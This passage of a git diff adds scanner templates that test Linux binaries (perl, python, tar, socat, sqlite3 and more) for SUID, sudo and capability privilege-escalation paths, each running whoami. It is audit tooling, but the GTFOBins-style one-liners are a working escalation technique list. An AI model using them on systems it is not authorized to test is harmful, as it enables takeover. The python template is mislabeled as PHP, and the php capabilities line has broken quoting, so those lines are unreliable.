https://gtfobins.github.io/gtfobins/node/ + metadata: + verified: true + tags: code,linux,node,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})' + + #SUDO + - engine: + - sh + - bash + source: | + sudo node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})' + + #Capabilities + - engine: + - sh + - bash + source: | + node -e 'process.setuid(0); require("child_process").spawn("whoami", {stdio: [0, 1, 2]})' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-nsenter.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-nsenter.yaml new file mode 100644 index 0000000000..9052644225 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-nsenter.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-nsenter + +info: + name: Nsenter - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/nsenter/ + metadata: + verified: true + tags: code,linux,nsenter,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + nsenter whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo nsenter whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-perl.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-perl.yaml new file mode 100644 index 0000000000..3e8069ab8c --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-perl.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-perl + +info: + name: Perl - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/perl/ + metadata: + verified: true + tags: code,linux,perl,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + perl -e 'exec "whoami";' + + #SUDO + - engine: + - sh + - bash + source: | + sudo perl -e 'exec "whoami";' + + #Capabilities + - engine: + - sh + - bash + source: | + perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-pexec.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-pexec.yaml new file mode 100644 index 0000000000..98caa29600 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-pexec.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-pexec + +info: + name: pexec - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/pexec/ + metadata: + verified: true + tags: code,linux,pexec,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + pexec whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo pexec whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-php.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-php.yaml new file mode 100644 index 0000000000..4e0a6c6539 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-php.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-php + +info: + name: PHP - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/php/ + metadata: + verified: true + tags: code,linux,php,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + php -r 'system("whoami");' + + #SUDO + - engine: + - sh + - bash + source: | + sudo php -r 'system("whoami");' + + #Capabilities + - engine: + - sh + - bash + source: | + php -r "posix_setuid(0); system("whoami");" + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-posh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-posh.yaml new file mode 100644 index 0000000000..ac416e2499 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-posh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-posh + +info: + name: posh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/posh/ + metadata: + verified: true + tags: code,linux,posh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + posh -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo posh -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-python.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-python.yaml new file mode 100644 index 0000000000..3dbea834d8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-python.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-python + +info: + name: PHP - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/python/ + metadata: + verified: true + tags: code,linux,php,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + python -c 'import os; os.system("whoami")' + + #SUDO + - engine: + - sh + - bash + source: | + sudo python -c 'import os; os.system("whoami")' + + #Capabilities + - engine: + - sh + - bash + source: | + python -c 'import os; os.setuid(0); os.system("whoami")' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rake.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rake.yaml new file mode 100644 index 0000000000..feb5b3bf43 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rake.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rake + +info: + name: Rake - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rake/ + metadata: + verified: true + tags: code,linux,rake,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rake -p '`whoami 1>&0`' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rake -p '`whoami 1>&0`' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rc.yaml new file mode 100644 index 0000000000..f4d8ce5ebc --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rc.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rc + +info: + name: RC - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rc/ + metadata: + verified: true + tags: code,linux,rc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rc -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rc -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rlwrap.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rlwrap.yaml new file mode 100644 index 0000000000..af24cc0803 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rlwrap.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rlwrap + +info: + name: rlwrap - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rlwrap/ + metadata: + verified: true + tags: code,linux,rlwrap,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rlwrap whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo rlwrap whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rpm.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rpm.yaml new file mode 100644 index 0000000000..026bdc56c8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rpm.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rpm + +info: + name: rpm - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rpm/ + metadata: + verified: true + tags: code,linux,rpm,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rpm --pipe 'whoami 0<&1' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rpm --pipe 'whoami 0<&1' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rpmdb.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rpmdb.yaml new file mode 100644 index 0000000000..f7d4dc0cc1 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rpmdb.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rpmdb + +info: + name: rpmdb - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rpmdb/ + metadata: + verified: true + tags: code,linux,rpmdb,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rpmdb --eval '%(whoami 1>&2)' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rpmdb --eval '%(whoami 1>&2)' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-rpmverify.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-rpmverify.yaml new file mode 100644 index 0000000000..37e53c761e --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-rpmverify.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-rpmverify + +info: + name: rpmverify - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/rpmverify/ + metadata: + verified: true + tags: code,linux,rpmverify,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + rpmverify --eval '%(whoami 1>&2)' + + #SUDO + - engine: + - sh + - bash + source: | + sudo rpmverify --eval '%(whoami 1>&2)' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ruby.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ruby.yaml new file mode 100644 index 0000000000..a2b1e9a9b9 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ruby.yaml @@ -0,0 +1,54 @@ +id: privilege-escalation-ruby + +info: + name: Ruby - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ruby/ + metadata: + verified: true + tags: code,linux,ruby,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ruby -e 'exec "whoami"' + + #SUDO + - engine: + - sh + - bash + source: | + sudo ruby -e 'exec "whoami"' + + #Capabilities + - engine: + - sh + - bash + source: | + ruby -e 'Process::Sys.setuid(0); exec "whoami"' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + - 'contains(code_4_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-run-parts.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-run-parts.yaml new file mode 100644 index 0000000000..76a2e3d181 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-run-parts.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-run-parts + +info: + name: run-parts - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/run-parts/ + metadata: + verified: true + tags: code,linux,run-parts,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + run-parts --new-session --regex 'whoami' /bin + + #SUDO + - engine: + - sh + - bash + source: | + sudo run-parts --new-session --regex 'whoami' /bin + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-sash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-sash.yaml new file mode 100644 index 0000000000..85806eea1f --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-sash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-sash + +info: + name: sash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/sash/ + metadata: + verified: true + tags: code,linux,sash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + sash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo sash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-slsh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-slsh.yaml new file mode 100644 index 0000000000..c3fd764778 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-slsh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-slsh + +info: + name: slsh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/slsh/ + metadata: + verified: true + tags: code,linux,slsh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + slsh -e 'system("whoami")' + + #SUDO + - engine: + - sh + - bash + source: | + sudo slsh -e 'system("whoami")' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-socat.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-socat.yaml new file mode 100644 index 0000000000..9016697ffb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-socat.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-socat + +info: + name: Socat - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/socat/ + metadata: + verified: true + tags: code,linux,socat,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + socat stdin exec:whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo socat stdin exec:whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-softlimit.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-softlimit.yaml new file mode 100644 index 0000000000..fee1f47c81 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-softlimit.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-softlimit + +info: + name: softlimit - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/softlimit/ + metadata: + verified: true + tags: code,linux,softlimit,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + softlimit whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo softlimit whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-sqlite3.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-sqlite3.yaml new file mode 100644 index 0000000000..7736c9b0aa --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-sqlite3.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-sqlite3 + +info: + name: sqlite3 - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/sqlite3/ + metadata: + verified: true + tags: code,linux,sqlite3,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + sqlite3 /dev/null '.shell whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo sqlite3 /dev/null '.shell whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ssh-agent.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ssh-agent.yaml new file mode 100644 index 0000000000..11bf610587 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ssh-agent.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-ssh-agent + +info: + name: ssh-agent - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ssh-agent/ + metadata: + verified: true + tags: code,linux,ssh-agent,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ssh-agent whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo ssh-agent whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-sshpass.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-sshpass.yaml new file mode 100644 index 0000000000..1b258a9690 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-sshpass.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-sshpass + +info: + name: sshpass - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/sshpass/ + metadata: + verified: true + tags: code,linux,sshpass,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + sshpass whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo sshpass whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-stdbuf.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-stdbuf.yaml new file mode 100644 index 0000000000..55299d5aa8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-stdbuf.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-stdbuf + +info: + name: stdbuf - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/stdbuf/ + metadata: + verified: true + tags: code,linux,stdbuf,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + stdbuf -i0 whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo stdbuf -i0 whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-strace.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-strace.yaml new file mode 100644 index 0000000000..718fe1b08b --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-strace.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-strace + +info: + name: strace - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/strace/ + metadata: + verified: true + tags: code,linux,strace,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + strace -o /dev/null whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo strace -o /dev/null whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-tar.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-tar.yaml new file mode 100644 index 0000000000..50b0da6204 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-tar.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-tar + +info: + name: tar - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/tar/ + metadata: + verified: true + tags: code,linux,tar,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-tcsh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-tcsh.yaml new file mode 100644 index 0000000000..4b81a10008 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-tcsh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-tcsh + +info: + name: tcsh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/tcsh/ + metadata: + verified: true + tags: code,linux,tcsh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + tcsh -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo tcsh -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-time.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-time.yaml new file mode 100644 index 0000000000..58ed4b5fc7 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-time.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-time + +info: + name: Time - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/time/ + metadata: + verified: true + tags: code,linux,time,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + time whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo time whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-timeout.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-timeout.yaml new file mode 100644 index 0000000000..32a3ff94b0 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-timeout.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-timeout + +info: + name: Timeout - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/timeout/ + metadata: + verified: true + tags: code,linux,timeout,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + timeout 7d whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo timeout 7d whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-tmate.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-tmate.yaml new file mode 100644 index 0000000000..f74b782e9f --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-tmate.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-tmate + +info: + name: tmate - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/tmate/ + metadata: + verified: true + tags: code,linux,tmate,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + tmate -c whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo tmate -c whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-torify.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-torify.yaml new file mode 100644 index 0000000000..775ce61fd3 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-torify.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-torify + +info: + name: Torify - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/torify/ + metadata: + verified: true + tags: code,linux,torify,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + torify whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo torify whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-torsocks.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-torsocks.yaml new file mode 100644 index 0000000000..f1f1bd496b --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-torsocks.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-torsocks + +info: + name: Torsocks - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/torsocks/ + metadata: + verified: true + tags: code,linux,torsocks,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + torsocks whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo torsocks whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-unshare.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-unshare.yaml new file mode 100644 index 0000000000..8c81840d2d --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-unshare.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-unshare + +info: + name: Unshare - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/unshare/ + metadata: + verified: true + tags: code,linux,unshare,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + unshare whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo unshare whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 